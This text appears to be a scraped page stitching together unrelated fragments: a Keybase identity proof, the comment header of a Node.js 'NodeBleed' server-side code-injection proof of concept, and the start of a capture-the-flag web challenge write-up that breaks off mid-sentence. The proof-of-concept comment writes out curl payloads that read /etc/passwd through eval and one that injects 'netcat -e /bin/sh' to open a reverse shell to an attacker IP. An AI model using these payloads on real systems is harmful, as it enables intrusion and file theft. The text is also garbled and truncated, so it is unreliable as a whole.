I hereby claim:
- I am simpsonpt on github.
- I am simpson (https://keybase.io/simpson) on keybase.
- I have a public key whose fingerprint is C709 0843 B313 B823 DD14 7046 52A3 759A 8429 29E4
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
/** | |
* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660 | |
* PoC: $ node nodejs-ssjs-nodebleed.js | |
* "Attack": | |
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))" | |
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}" | |
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C | |
* | |
* Insecure evals Payloads: | |
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999) |
During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.
The web challenge starts with a simple visit to an endpoint on http://159.203.178.9/ that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."
Without a shadow of a doubt; I must find a way to interact with that note service.
As always recon is the first thing to do. I started with the browser. After opening the page, I turned to the network tab on the Developer Tools and went through to the response headers, where I got "Apache/2.4.18 (Ubuntu)".
My first attempt was looking for "/server-status/" since the ([status